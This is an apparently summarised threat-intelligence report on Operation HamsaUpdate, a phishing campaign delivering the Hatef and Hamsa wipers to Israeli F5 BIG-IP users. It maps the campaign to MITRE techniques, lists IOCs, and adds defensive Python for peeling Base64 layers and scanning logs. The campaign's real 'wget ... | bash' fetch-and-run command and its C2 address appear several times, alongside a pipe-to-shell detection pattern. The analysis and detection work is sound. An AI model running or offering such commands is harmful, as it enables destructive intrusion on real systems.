Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers Puts Israeli Infrastructure at Risk

Operation HamsaUpdate is a sophisticated phishing-driven campaign targeting Israeli F5 BIG-IP users, delivering the Windows wiper Hatef and the Linux wiper Hamsa through a multi-stage loader chain. The chain includes a Delphi-based second-stage loader named Handala and an AutoIt injector; public IOCs were released by the Israel National Cyber Directorate. #Hatef #Hamsa #Handala #HandalaHackTeam #F5BIGIP #INCD

Keypoints

  • The campaign uses Hebrew-language phishing to pressure victims into running malicious code on their servers.
  • Two wipers are deployed: Hatef on Windows and Hamsa on Linux, each with a distinct loader/primer chain.
  • A Delphi-based second-stage loader named Handala orchestrates execution and an AutoIt injector is involved in the chain.
  • Handala can detect and attempt to disable security software, indicating defense evasion efforts.
  • IOCs include a C2 endpoint at 31.192.237.207:2515 and a Linux update script URL, alongside multiple file hashes and filenames.
  • Handala Hack Team has publicly claimed the activity, though formal attribution remains uncertain.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The campaign relies on a crafted Hebrew phishing email pressing victims to run a file. Quote: “The attack is initiated with a cleverly crafted phishing email … pressuring victims to execute the harmful code residing on their servers.”
  • [T1059.004] Unix Shell – Linux payload is fetched and piped straight into Bash: “wget -O - https://sjc1.vultrobjects.com/f5update/update.sh | bash”.
  • [T1027] Obfuscated/Compressed Files or Information – The Linux payload is described as “obfuscated … five Base64 encoding steps”. Quote: “The payload, obscured using a series of five Base64 encoding steps”.
  • [T1140] Deobfuscate/Decode Files or Information – The decoding process is described as mirroring the Delphi loader and involves removing ‘^’ characters to decode strings. Quote: “The decoding process mirrors that of the Delphi loader … eliminate the ‘^’ character.”
  • [T1562.001] Impair Defenses – The Delphi/Handala loader includes steps to “detect any active security software … and disable it.”
  • [T1485] Data Destruction – The wipers wipe key system paths (Users, Program Files, Windows) and delete directories after erasing files. Quote: “The wiper wipes key system paths … and deletes them.”
  • [T1041] Exfiltration Over C2 Channel – The wipers report host IP/hostname and disk information to a Telegram chat. Quote: “sends periodic updates to a predetermined Telegram chat… external IP address”. Because Telegram is a third-party web service, T1102 Web Service is the closer ATT&CK fit for this reporting channel.
  • [T1543.003] Windows Service – The loader instantiates a class named Service and calls its Run method. Quote: “spawn a new class instance named Service and invokes its Run method.” Note that a class named Service does not by itself prove registration as a Windows service; treat this mapping as tentative unless service-creation activity is observed.
  • [T1055] Process Injection – After the stealth/obfuscation steps, the Handala injector injects into a Windows Media Player process. Quote: “the code is then injected into a Windows Media Player Process.”
  • [T1064] Scripting (deprecated in ATT&CK; now covered by T1059 Command and Scripting Interpreter) – The AutoIt component runs a script through a renamed interpreter; Delphi is compiled, so only the AutoIt stage is scripting. Quote: “The AutoIt loader … Naples.pif is a renamed AutoIt interpreter.”
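The T1027/T1140 entries describe a Linux stage wrapped in five Base64 layers with ‘^’ characters that must be stripped before decoding. The following is an added example (not code from the original write-up or from the malware) showing how an analyst would peel such a wrapper generically. The inner command, the number of layers and the placement of the ‘^’ junk in the constructed sample are assumptions made for the example; the real stage is not reproduced here.

```python
import base64
import binascii
import re

# Constructed sample: a harmless stand-in for the staged Linux script, wrapped
# the way the write-up describes (five Base64 layers with '^' junk inserted).
# The inner command is a placeholder, not the real payload.
INNER = "echo 'placeholder for the staged shell script'"


def wrap_like_sample(plaintext: str, layers: int = 5) -> str:
    """Build a constructed sample: apply `layers` Base64 encodings, then insert
    a '^' after every seventh character. Where the real wrapper places '^' is
    an assumption for this example; the decoder below does not depend on it."""
    data = plaintext.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    text = data.decode()
    return "^".join(text[i:i + 7] for i in range(0, len(text), 7))


# Strict Base64 alphabet check (no whitespace, at most two '=' at the end).
B64_RE = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def peel(blob: str, max_layers: int = 10) -> tuple[bytes, int]:
    """Strip every '^' and Base64-decode repeatedly until the result no longer
    looks like Base64. Returns (decoded_bytes, layers_removed). A cap on the
    number of layers guards against pathological inputs that stay decodable."""
    data = blob.replace("^", "").encode()
    layers = 0
    while layers < max_layers:
        stripped = data.strip()
        if len(stripped) % 4 != 0 or not B64_RE.match(stripped):
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
        data = decoded
        layers += 1
    return data, layers


if __name__ == "__main__":
    sample = wrap_like_sample(INNER)
    plaintext, n = peel(sample)
    print(f"removed {n} layers -> {plaintext.decode(errors='replace')}")
```

The decoder stops on the first layer that is not valid Base64, so it also works on samples with fewer or more layers than five; when analysing a real sample, inspect the final bytes rather than trusting the layer count, since a shell script can by coincidence consist only of Base64-alphabet characters for a short prefix.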

Indicators of Compromise

  • [IP] C2/command channel – 31.192.237.207:2515
  • [URL] Command or loader delivery – https://sjc1.vultrobjects.com/f5update/update.sh
  • [File Name] Windows payload – Hatef.exe
  • [File Name] Windows loader – F5UPDATER.exe
  • [File Name] Windows injector – Handala.exe
  • [File Name] Loader/AutoIt interpreter – Naples.pif
  • [SHA256] Windows .NET executable – fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2
  • [SHA256] Windows .NET executable – ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a
  • [SHA256] ZIP container – ad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a
  • [SHA256] AutoIt Interpreter – f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3
  • [SHA256] AutoIt Script – aae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4
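To make the indicator list actionable, the following added example (not part of the original write-up) runs the IOCs above, plus a generic "download piped into a shell" pattern for the T1059.004 execution primitive, over a handful of constructed log lines. The log lines, the internal IP addresses in them and the `updates.example.invalid` host are invented for the example; only the IOC values come from the list above.

```python
import re

# Indicators copied from the IOC list above.
IOC_IPS = {"31.192.237.207"}
IOC_URLS = {"https://sjc1.vultrobjects.com/f5update/update.sh"}
IOC_FILES = {"hatef.exe", "f5updater.exe", "handala.exe", "naples.pif"}
IOC_SHA256 = {
    "fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2",
    "ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a",
    "ad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a",
    "f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3",
    "aae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4",
}

# Behavioural pattern: a downloader piped straight into a shell. This fires
# even when the attacker rotates the hosting URL.
PIPE_TO_SHELL = re.compile(r"\b(?:wget|curl)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")
IP_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?\b")
SHA256_HEX = re.compile(r"\b[0-9a-f]{64}\b")

# Constructed sample log lines (not real telemetry).
LOG_LINES = [
    'auditd: type=EXECVE a0="bash" a1="-c" a2="wget -O - '
    'https://sjc1.vultrobjects.com/f5update/update.sh | bash"',
    "conn: 10.0.0.5:51234 -> 31.192.237.207:2515 proto=tcp",
    r"Sysmon EventID 1: Image=C:\Users\x\Downloads\F5UPDATER.exe "
    "Hashes=SHA256=fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2",
    "sshd: Accepted publickey for ops from 10.0.0.9 port 55120",
    "cmd: curl -s http://updates.example.invalid/setup.sh | sh",
]


def scan_line(line: str) -> list[tuple[str, str]]:
    """Return (indicator_type, value) hits for one log line."""
    hits = []
    low = line.lower()
    for url in IOC_URLS:
        if url.lower() in low:
            hits.append(("url", url))
    for m in IP_PORT.finditer(line):
        ip, port = m.group(1), m.group(2)
        if ip in IOC_IPS:
            hits.append(("ip", f"{ip}:{port}" if port else ip))
    for name in IOC_FILES:
        # Match the file name as a whole token, so "handala.exe" does not
        # also fire on e.g. "xhandala.exe.bak".
        if re.search(r"(?<![\w.])" + re.escape(name) + r"(?!\w)", low):
            hits.append(("file", name))
    for digest in SHA256_HEX.findall(low):
        if digest in IOC_SHA256:
            hits.append(("sha256", digest))
    if PIPE_TO_SHELL.search(line):
        hits.append(("behaviour", "download piped to shell"))
    return hits


def scan(lines: list[str]) -> dict[int, list[tuple[str, str]]]:
    """Map line index -> hits, omitting lines with no hits."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


if __name__ == "__main__":
    for idx, hits in scan(LOG_LINES).items():
        print(idx, hits)
```

Hash and filename matches are exact-value indicators and will miss recompiled or renamed samples; the `wget … | bash` pattern and the C2 IP:port are the parts worth keeping as standing detections, with the caveat that the IP should be aged out once the infrastructure is retired.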

Read more: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/